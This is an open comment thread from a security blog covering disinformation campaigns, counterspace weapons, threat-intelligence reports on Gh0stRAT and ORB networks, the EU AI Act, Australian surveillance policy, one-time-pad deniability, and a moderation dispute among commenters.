@Bruce @SchneieronSecurity would be in the Australian government best interest to see you bring everything you’ve got in your arsenal here in 2024 Melbourne Victoria 26-28 NOVEMBER imo humble opinion ‘sure as hell wouldnt hurt ‘ right? given our errr UHM! somewhat schizophrenic policy decisions lately RE: cyber sec!.Just on that i guess you get an invite right? anything in you’re inbox?….yet???
1] LINK BELOW.👇
https://www.cyber….conference….com.au/

ResearcherZero May 21, 2024 1:20 AM

“dangerously bombastic and oversimplified ways of talking about complicated dynamics”

‘https://www.wired.com/story/rfk-jr-election-denialism/

When think-tanks begin repeating Russian messaging, it undermines public confidence.
https://www.nytimes.com/2024/01/21/magazine/heritage-foundation-kevin-roberts.html

Rep. Michael McCaul, the Texas Republican who chairs the House Foreign Affairs Committee, told Puck News this month that Russian propaganda has “infected a good chunk of my party’s base,” threatening the Ukraine aid.

“To the extent that this propaganda takes hold, it makes it more difficult for us to really see this as an authoritarian versus democracy battle, which is what it is,” Turner said.

‘https://edition.cnn.com/2024/04/17/politics/republicans-russia-ukraine-what-matters/index.html

RFK Jr missed all of the Kremlin’s moves, along with the long term implications.
https://www.washingtonpost.com/politics/2024/05/08/rfk-jrs-history-lesson-russias-invasion-ukraine-flunks-fact-test/

It is extremely difficult to communicate clear messages to the population of a free society against the background noise of sustained disinformation campaigns.

Democracy depends on reliable information about the evidence for various policy options.

‘https://theconversation.com/disinformation-campaigns-are-undermining-democracy-heres-how-we-can-fight-back-217539

The goal is to achieve an “invisible manipulation” and “invisible embedding” of information production “to shape the target audience’s macro framework for recognizing, defining, and understanding events,” write Duan Wenling and Liu Jiali, professors of the Military Propaganda Teaching and Research Department of the School of Political Science at China’s National Defense University. A recent PLA Daily article lays out four social-media tactics, dubbed “confrontational actions”: Information Disturbance, Discourse Competition, Public Opinion Blackout, and Block Information.

https://www.oodaloop.com/archive/2023/11/08/cognitive-infrastructure-worldwide-is-under-attack-in-the-worst-cognitive-warfare-conditions-since-wwii/

lastoftheV8s May 21, 2024 2:51 AM

My bad and apologies @Bruce @ all re-posting ‘fractured link here’ https://w w w.cyberconference.com.au/ as the fractured link in my OP is US:

Winter May 21, 2024 2:56 AM

@ResearcherZero

It is extremely difficult to communicate clear messages to the population of a free society against the background noise of sustained disinformation campaigns.

You can focus on only ONE enemy at a time.

As the current threat to the American Way Of Life (aka, apartheid) is seen to come from the Democrats and Democracy itself (aka, non-white and non-male voters), the Russians must take a backseat.

lurker May 21, 2024 5:16 AM

@ResearcherZero

Psalm 9:15-16 must surely apply to the social media comapnies and their algorithms who provide the platform for adversarial disinformation. Metaphors of zip malfunction will be trivial when we arrive at the malfunction of society itself.

May your book bring defimation May 21, 2024 6:10 AM

“From memory, Psalm 9:15-16 states something along the lines of”

Perhaps it would be more appropriate to back up a bit. To find what some claim is the Bib Prayer of Psalms 9:11-14

11 Sing the praises of the Lord, enthroned in Zion;
proclaim among the nations what he has done.
12 For he who avenges blood remembers;
he does not ignore the cries of the afflicted.
13 Lord, see how my enemies persecute me!
Have mercy and lift me up from the gates of death,
14 that I may declare your praises
in the gates of Daughter Zion,
and there rejoice in your salvation.

Remember you can as many chose to do make meaning from nonsense and call them truths. Further you can say all who deny are Godless and shall be struck down to eternal perdition.

All in time for Nov 2024 when the lunatics will have their asylum or with gnashing of teeth and cries of exit pole “truths” claim proof of theft and fraud to go rampaging.

Is such idiocy really the way to run a country?

noname May 21, 2024 7:46 AM

The number of students studying computer and information science has risen from 444,000 to 628,000 in the last five years in the US. That’s a 40% increase.

It’s the fourth most popular major and the fastest growing of the top 20 majors.

But right now the job market isn’t as elastic as the supply. Many students are having to scramble and branch out where they look for work.

Whether this slows the computer science pipeline is left to be seen.

https://news.ycombinator.com/item?id=40414244

fib May 21, 2024 8:23 AM

The iPhone turns 17 this year. The launch of the touchscreen-controlled device
signaled a moment that has defined our expectations of smartphones ever since.

A disgraceful milestone. My expectation for smartphones is nothing but the end of civilization. Almost all political radicalism poisoning the Western societies can be mapped to those infamous micro glass-and-plastic monoliths.

May Steve Jobs’ stomach roast in hell.

Anonymous May 21, 2024 1:24 PM

on iOS 17.5

you might have to Reset Face ID from Settings Face ID & passcode
To test it, just let a friend make a call from your iPhone after you’ve locked it.

lastoftheV8s May 21, 2024 3:19 PM

Shout out to @echo for gifting me especially “that will become clear in a sec” the community a damn good chuckle ( no really its a ripper) i was reading you’re post re: ‘turtle tanks’ etc, yes i was aware of the turtle thingy but but wait what the hell are these cope cages? and what! the bloody hell is emotional support Armour? im thinking @echoes done his homework here righto! chaps i say my best Aussie slang masquerading as my finest Englishmen stiff upper lip type ripp off voice but we’re here for a laugh and this better be good @echo im thinking so into the breach we go and what a surprise ol mate @Perun is a bloody Aussie! this @echo bloke obviously knows more about me than i do and as an Aussie @Perun takes the absolute piss (as we say down here) out of himself thats code for “yeah nah were going full self deprecating mode here and by god he’s nailed it, so im still on old mate @Peruns youtube vid ill get to the other in good time and he’s a gamer me too 4extra credits there ! and speaking of us Aussies ‘taking the piss out of ones self etc,etc, and the whole self Annihilation of ones character all in the name of having a good ol belly laugh and hey you only live once right and lifes to short for too much idk “mind snapping serious effery aint it ? so i gave myself the handle years ago when firing up battlefield 3/4 “haveibeenpwned” love getting extra attentin in game cos theres always that player who gets the better of me and has just gotta remind me ‘yes you “havebeenpwned” pal!
PS i did email Troy hunt after i took the “haveibeenpwned” handle as my in game avatar name and politely told Troy il cease and deist if he took um-bridge with me using a name thats well the name of his business right and i never heard back and Troy being Another Aussie i reckon id like to think were all on the same page here anyways @echo nice job mate and a good read thank you for you’re effort.☮☮

lastoftheV8s May 21, 2024 6:22 PM

@echo ? i must admit i sometimes just cant decipher the tea leaves i apologize if i have caused you any discomfort here today from my reply to you earlier! certainly never my intention.☮☮

Future Red Olive Orchard 2067 May 21, 2024 8:23 PM

forum discussion topic idea: screengrabs and photos of internet-ready kiosks in the strangest (wrongest!) places

ResearcherZero May 22, 2024 1:58 AM

@May your book bring defimation

Re: Is such idiocy really the way to run a country?

No.

Clown cars generally belong in the circus. More a space for inconsistent, unreliable or unforeseen results. That does not seem like the appropriate arena for good policy outcomes.

“Policy makers now have more facts and theories at their disposal while the unintended consequences of policy are a widely recognized problem.”

Unanticipated consequences, so it seems, are disappearing from the literature because they are being called by another name: “unintended consequences.”

Rulers and policy reformers benefit from conflating “unintended” and “unanticipated” consequences because it helps shed responsibility and avoid discussion.

‘https://link.springer.com/article/10.1007/s11186-015-9247-6

‘https://www.airandspaceforces.com/russia-counterspace-weapon-near-us-satellite/

Directed-energy devices would probably be a part of any future system.

https://www.nytimes.com/2024/05/17/us/politics/pentagon-space-military-russia-china.html

“The Russian weapon is still under development and is not yet in orbit. If deployed, such a weapon could destroy satellites by creating a massive energy wave when detonated, potentially crippling a vast swath of the commercial and government satellites that the world below depends on to talk on cell phones, pay bills, and surf the internet.”

‘https://edition.cnn.com/2024/05/21/politics/us-assesses-russia-launched-counter-space-weapon/index.html

At present Russia has shown the most aggressive behavior in space.
https://www.csis.org/analysis/space-threat-assessment-2024

Nesting doll systems.

‘https://breakingdefense.com/2023/12/leolabs-russia-china-time-suspicious-space-activity-for-some-us-holidays/

Russia
https://www.thespacereview.com/article/4401/1

China tripled its intelligence, surveillance and reconnaissance satellites since 2018.
https://www.thespacereview.com/article/4431/1

“This implies that command and control capabilities may be present on presumed ‘zombie’ satellites.”

‘https://spacenews.com/leolabs-data-shows-on-orbit-maneuvers-by-russian-satellites/

lurker May 22, 2024 2:09 AM

Die weltt die will betrogen syn.
[The world wants to be deceived, so let it be deceived.]

attr. Sebastian Brant, Das Narrenschiff 1494 [The Ship of Fools]

500 years headstart on social media.

ResearcherZero May 22, 2024 2:12 AM

China has also “built a range of counterspace weapons, from reversible jamming all the way up to kinetic hit-to-kill direct-ascent and co-orbital ASATs,” Whiting said.

‘https://www.space.com/china-space-progress-breathtaking-speed-space-force

In 2018, Russia and China agreed on the joint application of GLONASS/Beidou.

Strategic collaboration between the two states in a contested, future-oriented domain like satellite technology could have serious implications for Ukraine, despite claims that such cooperation is in pursuit of ‘peaceful goals’.

In Ukraine, GLONASS has already enabled Russian missile and drone strikes via satellite correction and supported communications between Russian troops through its connection to Azart portable digital radios. The resulting Chinese footprint in Azart radios could help Russia expedite GLONASS/Beidou integration to improve satellite-driven tactical operations. Additionally, Russia could exploit Beidou’s ability to facilitate the navigation and tracking of autonomous vehicles for strategic attacks with missiles and drones.

https://www.rusi.org/explore-our-research/publications/commentary/hi-tech-high-risk-russo-chinese-cooperation-emerging-technologies

An initial 108 satellites of a total of around 12,000 G60 Starlink satellites are to be launched across 2024.

‘https://spacenews.com/first-satellite-for-chinese-g60-megaconstellation-rolls-off-assembly-line/

Winter May 22, 2024 5:57 AM

@ResearcherZero

despite claims that such cooperation is in pursuit of ‘peaceful goals’.

Note that cemeteries are very peaceful places.

Kant remarked that In Eternal Peace was the name of an inn next to a cemetery. That seems to be the kind of peace they go for.

Anonymous May 22, 2024 7:38 AM

@ResearcherZero
@Winter
@ALL

Is it speculation

“Directed-energy devices would probably be a part of any future system.”

Or a foregone conclusion?

Thus a disaster to condemn mankind to an untimely demise?

A study of history shows technology can be used for good or bad and in some cases the identical usage is both.

Thus this was predictable from before the space-race ever started and if you check much longer before that as even the space-race was predicted.

But as for “Directed-energy” devices, something people forget is that there are three basic types of transmitting energy

  1. Conduction
  2. Radiation
  3. Convection

Where convection is when considered with a little thought the first two combined. And Radiation the result of Conduction.

To see why consider kinetic energy we know from the basic physics we get sort of taught at school that an object will take the energy from a source object and in effect ‘hold it indefinitely’ untill it gives it up by some interaction with other objects.

The reality however is the energy is all to do with relative velocity and mass. Crudely if you start an object moving in space we say something daft like

“It won’t stop untill it hits something”

The reality is it imparts energy to another object that in turn has it’s velocity changed. But it does it as a vector addition. And if one or both objects break up they radiate in all directions each taking some part of the interaction energy with it as relative velocity.

Somebody thought this through some years ago and realised that no matter what energy source was used the result would be eventually a form of convection like Brownian Motion and other statistical mechanics it was just a question of “scale”.

The first person to think through the problem was probably Albert Einstein back in the late 1800’s that culminated in his 1905 paper

“Investigations on the Theory of the Brownian Movement”

(republished by Dover Press of London in 1956).

We are still learning new things from that paper over a century later.

Of the more recent thinkers on the subject with regards to space satellites and objects in orbit are Donald Kessler and Burton G. Cour-Palais who in 1978 published in the Journal of Geophysical Research

“Collision frequency of artificial satellites: The creation of a debris belt”

That inspired the term “Kessler Syndrome”

The physics of which says all directed energy systems will end up in the Brownian Motion of space junk that is the Kessler Syndrome, effectively

“Locking us out of space thus condemning the human race to an untimely death”.

As a side note Donald Kessler was at the time a researcher in NASA’s Environmental Effects Office, the paper has now gone on to effect thinking in “climate change”

https://yaleclimateconnections.org/2012/04/the-climate-problem-weve-been-here-before/

Has the “clown car” stopped moving?

Winter May 22, 2024 8:46 AM

@Anonymous

Directed-energy devices would probably be a part of any future system.

Mass carries more momentum per joule than photons. I think grenades/rockets still beat anything made up of photons.

PS: Are you trying to channel Clive?

Bob Paddock May 22, 2024 11:06 AM

The 7th annual “Directed Energy Symposium” is September 11-12, 2024 in
National Harbor, MD. The “AI For Defense Summit” is the same date and time, in DC.

The “DoD Energy & Power Summit” is July 31-Aug 1, 2024 in DC.

They have become more selective about openly publishing the agendas for the events.

ResearcherZero May 22, 2024 7:53 PM

@Anonymous

Used in space, to fry electronics without blowing the satellite into pieces. That would be the general idea. Other options, include shunting some so they burn up, or capture.

Blowing them up so that pieces continue to orbit the Earth would not be the ideal solution.
Microwave to fry circuits – or perhaps lasers that could push satellites would be safer.

The sun is a long way away. Disposing of satellites in the sun does not seem viable.
A Greek chap named Aristarchus of Samos had a crack at measuring the distance, about 1,700 years before Nicolaus Copernicus. He postulated it was a pretty f’ing long way away.

‘https://techcommunity.microsoft.com/t5/windows-it-pro-blog/vbscript-deprecation-timelines-and-next-steps/ba-p/4148301

“By setting the working directory to a remote location, MSBuild will search for a project file on that remote server. If a project file is found, MSBuild will execute the code it contains entirely in memory, leaving no traces on the victim’s machine.”

‘https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/

Gh0stRAT is a 32-bit dynamic link library (DLL) written in C++ dating back to 2001.
Gh0st provides attackers with access (a client and server) and control of the system.

“One monk recalled watching his computer open Microsoft Outlook all on its own, attach documents to an email, and send that email to an unrecognized address, all without his input.”

‘https://www.forbesindia.com/printcontent/28462

So how might you find a Gh0st on your system?
https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

Gh0stRAT is often delivered through spear-phishing campaigns and malicious attachments.

‘https://www.malwarebytes.com/blog/news/2020/06/higaisa

Gh0st RAT primarily targets government agencies, embassies, foreign ministries, and military offices. The first public version of Gh0st became available in 2008.

GhostNet
https://www.nytimes.com/2009/03/29/technology/29spy.html

ORB nodes can use a mixture of leased VPS, compromised routers, or both.

“Networks can be provisioned networks, which are made up of commercially leased VPS space that are managed by ORB network administrators, or they can be non-provisioned networks, which are often made up of compromised and end-of-life router and IoT devices. It is also possible for an ORB network to be a hybrid network combining both leased VPS devices and compromised devices.”

“We no longer operate in the world of “block and move on” where IPs are part of APT’s weaponization and C2 kill chain phase. Instead, infrastructure is a living artifact of an ORB network that is a distinct and evolving entity where the characteristics of IP infrastructure itself, including ports, services, and registration/hosting data, can be tracked as evolving behavior by the adversary administrator responsible for that ORB network.”

‘https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks

ResearcherZero May 22, 2024 8:05 PM

@Anonymous

Ideally not weaponising space would seem like a very good idea. However no one seems willing to compromise at this point in time. Everything so far has been weaponised, including the deep blue sea. Weaponised dolphins, porpoises and beluga whales.

There is even an explosive squid drone that can be fired out of a cannon.
People are even wound up and weaponised against themselves. It happens all the time.

‘https://spectrum.ieee.org/caltech-canon-launched-squid-drone

ResearcherZero May 23, 2024 12:04 AM

‘https://www.politico.com/news/2024/05/21/trump-classified-documents-bedroom-00159182

“strong evidence” that the former president “intended” to hide classified documents
https://edition.cnn.com/2024/05/21/politics/mar-a-lago-documents-walt-nauta-donald-trump/index.html

A cyber attack took place against New Caledonia may originate from Russia.

‘https://www.lemonde.fr/en/pixels/article/2024/05/22/new-caledonia-cyberattack-denounced-by-authorities-is-not-quite-unprecedented_6672315_13.html

https://ioda.inetintel.cc.gatech.edu/country/NC?from=1715844319&until=1716362719

In just two weeks Russia, China and Iran produced nearly 400 articles in English about the protests. Russia seem to be antagonizing both pro-Israeli and pro-Palestinian groups.

‘https://www.nytimes.com/2024/05/02/business/media/campus-protests-russia-china-iran-us.html

Posts from Russian state media, Russian diplomats/commentators increased by 400%
https://www.nbcnews.com/news/investigations/russia-trying-exploit-americas-divisions-war-gaza-rcna149759

Moscow may be involved in pro-Palestinian red hands being daubed on Paris’s Shoah memorial

‘https://www.lemonde.fr/en/france/article/2024/05/22/red-hands-at-paris-shoah-memorial-investigation-points-to-foreign-interference_6672318_7.html

Ramallah lynching
https://www.theguardian.com/world/2001/jun/26/israel

Winter May 23, 2024 9:10 AM

@ResearcherZero

Everything seems duller and less informative without his expertise, wit and clever snark.

Indeed.

noname May 23, 2024 3:41 PM

@echo

I’m really interested in the EU AI Act’s prohibited AI practices (Article 5) and if they will have global carryover.

vas pup May 23, 2024 4:35 PM

US Air Force releases first in-flight photos of B-21 Raider, newest nuclear stealth bomber
https://www.yahoo.com/news/us-air-force-releases-first-163639778.html

“The U.S. Air Force released the first in-flight photos of its newest nuclear stealth bomber, the B-21 Raider, on Wednesday after defense officials confirmed the sleek military aircraft had taken to the sky in California.

The Air Force and Northrop Grumman, who manufactured the aircraft, unveiled the B-21, a new, long-range strike bomber capable of carrying nuclear weapons, in December 2022.

When the B-21 enters the service, Ellsworth Air Force Base in South Dakota, will be is central operating base and training center. Whiteman Air Force Base in Missouri, and Dyess Air Force Base in Texas are listed as backup bases in the release.

“Designed to operate in tomorrow’s high-end threat environment, the B-21 will play a critical role in ensuring America’s enduring airpower capability,” the Air Force wrote on its website.

The B-21 will replace the military’s current B-1 and B-2 models, “becoming the backbone of the U.S. Air Force bomber fleet.”

The B-21 is the first new American bomber aircraft in more than 30 years, and is one of six under production, according to the Air Force. The Air Force previously reported it expects to eventually have at least 100 of the new bombers.”

echo May 23, 2024 7:09 PM

@noname

I’m really interested in the EU AI Act’s prohibited AI practices (Article 5) and if they will have global carryover.

Good question. I had a draft I never published in the new AI topic which touched on the underlying issues and didn’t publish it. I only discovered the EU AI Act covered it after reading a legal commentary on Article 5 after you asked the question. Thanks!

I can’t say it will have global carryover but I think it’s likely given the issues have overlap with regulated professions and duties of care.

* Subliminal, manipulative and deceptive systems. AI systems that deploy subliminal techniques beyond a person’s consciousness or purposefully use manipulative or deceptive techniques that materially distort people’s behavior by appreciably impairing their ability to make informed decisions. Such systems cause people to make decisions that they would not have otherwise taken, [likely] resulting in significant harm.

* Exploiting vulnerabilities. AI systems that exploit people’s vulnerabilities due to their age, disability, or social or economic situation. Such systems also distort people’s behavior, [likely] resulting in significant harm.

This may make people jumpy. Lawyers in general, psychiatric medical professionals, and NGO’s representing vulnerable people might object to AI without more research into its consequences.

Biometric categorization. AI systems that categorize individual natural persons based on their biometric data to deduce or infer their race, political opinions, trade union membership, religious or philosophical beliefs, sex life, or sexual orientation. Importantly, the processing of biometric data for the purpose of uniquely identifying an individual is subject to strict restrictions under the GDPR. Such processing is prohibited unless one of the limited exceptions applies, such as the data subject’s explicit consent.

Ooof. This is going to be fun.

lastoftheV8s May 23, 2024 10:58 PM

Off the back of this article by @Bruce’s Blog post dated “Posted on July 17, 2017 at 6:29 AM” https://www.schneier.com/blog/archives/2017/07/australia_consi.html…im not making this up and i will hunt down my original post regarding the some what bat@hi% this crazy policy i wrote to ” electronic Frontiers Australia ” telling the story of me calling up A.S.I.O https://www.asio.gov.au/ “Australian Security Intelligence Organization” yes i did ring em up and i twas quite enlightening. So please stand by ill go on the hunt for my post to EFA ik it exists ive found it a while back and did not bk mark it but yeah ill be back. ☮

lastoftheV8s May 23, 2024 11:23 PM

My short encounter phone call with A.S.I.O what i didnt mention in my op was when the employee at ASIO picked up i realized ‘how do i address these employees ?? like is it excuse me ‘officer , or special agent , or what ?? so i said Hello im … from … are you the quote ‘phone boy or errr idk how do i address you sir?? he said : whattya want mate?? ok then i started my rant? statement idk i got flustered any way link below.

Quote” im not making this up-few weeks back now i rang ASIO told him who i was where i was calling from mobile number showing, re: facial recognition/the so called “capability”my drivers license photo-3rd partys- fed gov track record on keeping our digital records etc etc concerns, bout a 5 min call i spoke to a bloke and strait off the bat he just grunted and made various other noises like ah uh’ ah uh’m mm’ m mm’ kinda thing then i got the ol ‘quote’ bit dramatic eh m8 bit dramatic’ end quote…he said he would pass it on??? ya u do that officer…
Comment by amibeingpwned on 26 November 2017 at 11:13 ”

https://webarchive.nla.gov.au/awa/20181122145110/http://pandora.nla.gov.au/pan/10264/20181123-0000/www.efa.org.au/2017/10/06/face-database-free-society/index.html

lastoftheV8s May 23, 2024 11:32 PM

Im imagining that ASIO employee over drinks at the pub that night was telling his mates Some clown from…rang me today he was from….and he said this and that etc,etc ‘what did you say to said clown?? ‘i told him he was being dramatic and ill pass it on’

‘Ill run a trace on him ya nvr know right?’…good idea bob or trev or ???.anyway i was not trying to be an A hole ci dont ring ASIO every week you know! just sayin.

lastoftheV8s May 23, 2024 11:57 PM

I remember mentioning to said ASIO officer/employee about a sunset clause on search warrants ok i think that’s when i got the ‘bit dramatic mate ‘ quip idk from memory ok thats fine…so i rang the attorney Generals dept in Canberra i unknowingly did this lady’s head in with a bunch of questions like….
do officers need a search warrant to search an individuals digital data/meta ?? i did not get an answer…i asked if a search warrant is necessary is there a sunset clause ?…did not get an answer…can i speak to someone who might be able to help me with my line of inquiries???….then with raised voice blurted out “STOP STOP” ill get someone to call you back.

lastoftheV8s May 24, 2024 6:00 AM

End-to-end encryption trends and challenges — position statement<

https://www.esafety.gov.au/industry/tech-trends-and-challenges/end-end-encryption

This is the position of Australia's e-safety commissioner….

…………Advice for users…….

👉"Users are advised to take extra care when communicating on services.that use end-to-end encryption, particularly when they do not know the person they are communicating with. It’s especially important to remember that any form of encryption can heighten the risk of concealed online interaction between adults and children."👈

Me….Now for my own insanity id like to retort!.

Me…Excuse me commissioner can we go back to the 'users are advised' bit please!

FBI seems kinda tipsy topsy turvy lately May 24, 2024 3:35 PM

Be careful, even some alleged antispam sites (stopforumspam) might be phishing sites.
For example, if you give them a bunch of truthful info and your true mailing address and they still won’t process the submission data form, then maybe it’s just stealing your info.

There are other sites that claim to be “helpers” for computer users, but are really just attack sites in disguise.

lurker May 25, 2024 1:10 AM

@lastoftheV8s
“Users are advised to take extra care when communicating on services.that use end-to-end encryption, particularly when they do not know the person they are communicating with.”

I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.

echo May 25, 2024 1:53 AM

I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.

100% this. Anyone attacking relationship and sex and gender lessons is creating an abusers charter. No guesses who the largest and shoutiest organisation is who wants to dismantle it. The Catholic Church and various fellow travelers.

I have my own security protocols and thoughts on this subject. To boil it all down I think if there’s one red flag anyone can relate to is it’s anyone wanting to carve someone out of the herd i.e. take it private. If anything happens which doesn’t stand up against known good standards that’s another red flag. If anything feels off RUN.

I’ve heard parents say how they did everything right and something bad still happened. The one thing I can glean from this is if a child seems unusually quiet or emotional or withdrawn it’s a red flag.

ResearcherZero May 25, 2024 3:02 AM

@lastoftheV8s

Yes they do need a warrant. It depends if you are worth the time. But perhaps they might use you for a training exercise.

Don’t send them flowers for Valentines.

Clive ideas fan May 25, 2024 10:56 AM

@lurker
@lastoftheV8s

“I don’t have a mathematical proof, but even if there is so-called end-to-end encryption, when you don’t know the person you’re communicating with, what is your level of trust? This is a vital factor in your security.”

A sensible answer rather than…

The level of trust rather depends on “information” that is known to both parties but not to any other parties.

It is used as “A root of trust” to show the first and second parties are “probably” who they say they are.

This has been discussed before on this blog and it only deals with the security of the information not the parties.

With conventional encryption it actually takes very few bits of information that a decryption key is the only valid decryption key. Shannon called this “unicity distance” and it applies to nearly all shorter than the message encryption key systems

https://en.m.wikipedia.org/wiki/Unicity_distance

However if the key is one bit long than the message or longer, the possibility for other keys that give the same message increases. For instance AES with 128 bit keys, for a one bit message 2^127 keys ie half of them will give the correct answer.

This means that you can have two or more valid messages from the same ciphertext under different keys. The only way to tell is by the plain text statistics. Which is one of the reasons to use “Chain Encryption” or “super encryption” systems

https://en.m.wikipedia.org/wiki/Multiple_encryption

As @Clive Robinson has pointed out Shannon “perfect secrecy” systems necessarily raise a real issue. The way they work means

“All messages are equiprobable from the same ciphertext.”

So with the issue that all bits in the keytext are fully independent of each other, there is no way to know if you have the right keytext thus the right plaintext.

As @Clive Robinson pointed out this gives

“Deniability against betrayal by the receiving party.”

That is if you encrypt a message padded out to a standard length with a One Time Pad nobody else knows what the plaintext is for the sent ciphertext. If the receiving party uses the corresponding One Time Pad they get the padded plaintext back.

But what if the receiving party makes a fake One Time Pad after receiving the ciphertext. They can make the plaintext be anything they want. So they can give the fake One Time Pad to a third party who already has the transmitted ciphertext.

Thus the plaintext the third party gets can be anything the receiving party wants.

But the same trick works the other way. That is the transmitting party can supply any fake one time pad they want that gives an entirely different plaintext.

Even if both the transmitting and recieving parties are giving a third party their keytext even if they are the same the third party has no way to know what the real plaintext was.

This means the OTP has strong deniability.

It also means that all plaintexts are untrustworthy.

So when you ask

“what is your level of trust? This is a vital factor in your security.”

At the encryption layer it’s effectively “zero”.

@Clive Robinson did go on to expand the system to show you could by using redundancy in plaintext at a high level (words sentences) that you could send a plaintext message that looks entirely innocent that has a covert message hidden inside it using Perfect Secrecy to make the covert channel.

So proved that there was no way that even “backdoors” could give the authorities plaintext, and even under betrayal by one of the corresponding parties the other party could fully deny it.

A little while later a paper showed similar results could be obtained with LLM AI systems. However such a system was not practically usable for obvious reasons.

Winter May 25, 2024 11:07 AM

@All
I get the impression someone got banned from the blog and is now handle hopping. If true, the fact that they continue with the activities that got them banned shows that this action of the moderators was justified.

Anonymous May 25, 2024 12:43 PM

@Moderator

Re:
https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-emotional-support-squid-2.html/#comment-437328

  1. The censored was quietly posting nothing to do with @echo

The post that was removed veered substantially into the EU AI Act and was largely “off-topic” in the Zero Day thread. The post criticized links to law firm analysis as “foolishly given links to advertorials.”

In fact, there was more criticism directed at legal analysis than there was discussion on Zero Days, or even on the EU AI Act itself, for that matter.

Only one person had recently provided a link to legal analysis on the EU Act: @echo.

@echo’s link, that is still up, is a post that was also republished by NYU Law’s Program on Corporate Compliance and Enforcement Blog.

To claim that “the censored was quietly posting nothing to do with @echo” is at best disingenuous.

At worst, the valuable conversation on AI safety is derailed for conflict’s sake.

Anonymous May 25, 2024 9:43 PM

@Anonymous not at all

@echo reported the now-deleted post to @Moderator with one sentence of their own. There was no “unwarranted ad hominem and vituperative invective filled attack on the poster of the second post in a near demented way.” No overkill was necessary.

Anonymous May 26, 2024 12:15 AM

@Anonymous not at all

I am not aware of the post you are referring to. There was a quite lengthy post with the words ‘rage’ and ‘spittle’. But I forget exactly where it is. Do you have a way to find this?

lurker May 26, 2024 1:36 AM

@whomsoever
“A fifty+ with the bullying behaviour and tantrums of a spoilt brat is not a pretty sight.”

More than one of them blocks the view for the rest of us.

lastoftheV8s May 26, 2024 3:04 AM

@ResearcherZero…id like to find out the legality’s around the sunset clause regarding said ‘search warrant’ the cynic in me shouts ‘by the way citizen we (LEA) decide when the sun goes down you got that?

Winter May 26, 2024 3:25 AM

@All
Using several handles pretending to be different persons is conclusive evidence of bad faith. Every comment from these entities should be removed irrespective of content.

Comments republishing texts and comments as if they are their originals show bad faith and fraud. These should be removed irrespective of content.

Any comments complaining about @moderator decisions should be deleted on this ground alone.

The recent wave of attacks on @echo and bystanders should all be removed just for these three reasons alone.

My conclusion from these characteristics is that the recent wave of personal attacks by various handles is the work of bad faith entities who try to disrupt this blog site and silence it’s voices.

We have seen more crude and heavy handed attacks trying to discredit our host earlier. This might be a second, more subtle attempt.

lastoftheV8s May 26, 2024 3:33 AM

@All Im assuming there’s allot of currently practicing/working and former cypher/cryptologist professionals that frequent these forums, can i ask if any of you know and are aware of and have had a crack at this? 👉art installation Kryptos CIA headquarters👈
If so would you mind sharing a few good morsels please?.
Me personally have nvr heard of it i came across this dilemma on a fantastic youtoobers channel his handle “LEMMINO” (no affiliation) https://www.lemmi.no/p/the-unbreakable-kryptos-code.

Winter May 26, 2024 3:43 PM

“@Handle Hopper”

There is nobody here using that in the name field and as far as an archive search shows nobody ever has.

That is a convenient shorthand for someone who hides behind so many names to avoid being identified, and then being identified by this behavior.

I normally avoid feeding trolls, but for old times sake, I want to advice to seek professional help, and a life. Both might be difficult where you live, but you can always try.

echo May 26, 2024 6:43 PM

@moderator

Because of the second wave of attacks this week there’s a little mess still left to clean up. Entity is repeating disinformation/personal attacks and adding to workload of moderation, and both prolonging moderation matters and attempting to socialise their actions and cause moderation confusion.

Entity also appears to continue posting using “handle hopping” and posts plausible content in a style resembling a previous high profile person currently holidaying from this blog. Entity has used cut-and-paste content from previous comments by this same person.

https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-emotional-support-squid-2.html/#comment-437390

Further they are all to do with @echo’s Cyber-Stalking, Cyber-Bullying, and worse things that you have been repeatedly warned of for over half a decade as can be demonstrated.

https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-dana-squid-attacking-camera.html/#comment-437353

Winter May 27, 2024 5:13 PM

@Handle Hopper

@Moderator

Why are you bothering the moderator with your whining about me? They have important work to do and should not be distracted with your posturing.

If you have something against me, take it up with me.

If I make an error, say so, then I can learn something. Vague references to past controversies don’t help. But maybe you just want to wallow in other people’s mistakes?

Winter May 27, 2024 5:21 PM

@Channel Hopper

Has @Winter stolen the style of “@-“?

I am happy to give praise where praise is due.

I learned from @- how to notify the moderator in the most efficient manner. I appreciate efficiency and effectiveness and @- was/is a good teacher.

Winter May 28, 2024 3:39 AM

@Handle Hopper

“Committed academic/research fraud”

A lot of posturing again, but we are still waiting for the comment to be pointed out. Or any other of the many cases you claim there are.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.